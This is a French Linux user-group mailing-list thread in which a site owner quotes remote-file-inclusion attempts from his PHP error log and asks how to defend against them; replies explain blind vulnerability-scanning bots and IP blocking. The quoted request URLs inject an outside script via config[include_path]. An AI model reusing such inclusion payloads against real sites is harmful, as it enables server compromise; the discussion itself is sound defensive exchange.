En gros tu blacklists l'ip pendant quelques heures ? Le 02/04/08, neofutur<[EMAIL PROTECTED]> a écrit : > oui, ce sont des robots de recherche de failles, des requetes de ce > genre j'en ai des milliers chaque jour sur mes serveurs, au point que > generalement il y a plus de charge en provenance des robotsd qu'en > provenance des visiteurs reels. > > En general ces robots testent des failles connues pour un cms ( > joomla, phpbb . .. . ) mais en aveugle, ils cherchent la faille sur > tous les sites du web sans chercher a savoir si le site web possede le > logiciel concerne par la faille. > D'une maniere generale tu ne risque rien.si ton site web n'utilise > pas le logiciel concerne par la faille recherchée, le seul vrai risque > est pour l'hebergeur de ton site qui, s'il heberge des dizaines de > sites web sur un meme serveur, risque d'etre surcharge par des > dizaines de requetes de ce genre a la minute. > Sur certains de mes serveurs j'ai du en arriver a creer des > expressions regulieres qui detectent dce genre de requetres bidon pour > ensuite dropper reguilierement les adresses ips utilisees par ces > robots, sans quoi ils generent tellement de charge sur le serveur que > les sites peuvent etre injoignables pour les vrais utilisateurs. > > Le 02/04/08, Yann Cochard<[EMAIL PROTECTED]> a écrit : > > > Bonjour, > > > > Sur mon site en PHP, je repère des tentatives d'intrusion / prise de > > contrôle / récupération de données sensibles. Elles n'ont pas l'air > > efficaces (c'est pour ça que j'en ai connaissance d'ailleurs : j'ai un > > log d'erreur), et se font par massage de paramètres. > > Exemple : > > > http://monsite/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt? > > ou même : > > > http://monsite/mapage.html/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt? > > Comme je n'ai pas de page config_settings.php et que mes pages ne > > prennent pas les paramètres de cette manière, ça ne marche pas... o_O > > Pour voir le contenu du script que l'attaquant essaie de faire > > tourner, voyez ce fichier texte : > > http://www.health-nutrition-business.com/echo.txt > > > > La question que je me pose : ces attaques sont-elles conçus pour des > > programmes PHP connus (par exemple phpBB), ou bien peuvent-elles > > fonctionner sur du code maison ? > > Comment s'en prémunir ? > > > > Merci > > Yann > > > > -- > > _________________________________________________________________ > > Kaella, distribution Linux live-cd : http://kaella.linux-azur.org > > > > Diffusez cette liste aupres de vos relations :) > > Linux Azur : http://linux-azur.org > > L'auteur du post est responsable de ses écrits ! > > *** Pas de message SMS, HTML ni de PJ SVP *** > > > > > > -- > Cordialement > > William Waisse > http://waisse.org | http://neoskills.com > http://cahierspip.ww7.be | http://feeder.ww7.be > > carte de visite : http://xena.ww7.be/my_carte2.jpg > > > Diffusez cette liste aupres de vos relations :) > Linux Azur : http://linux-azur.org > L'auteur du post est responsable de ses écrits ! > *** Pas de message SMS, HTML ni de PJ SVP *** >
Diffusez cette liste aupres de vos relations :) Linux Azur : http://linux-azur.org L'auteur du post est responsable de ses écrits ! *** Pas de message SMS, HTML ni de PJ SVP ***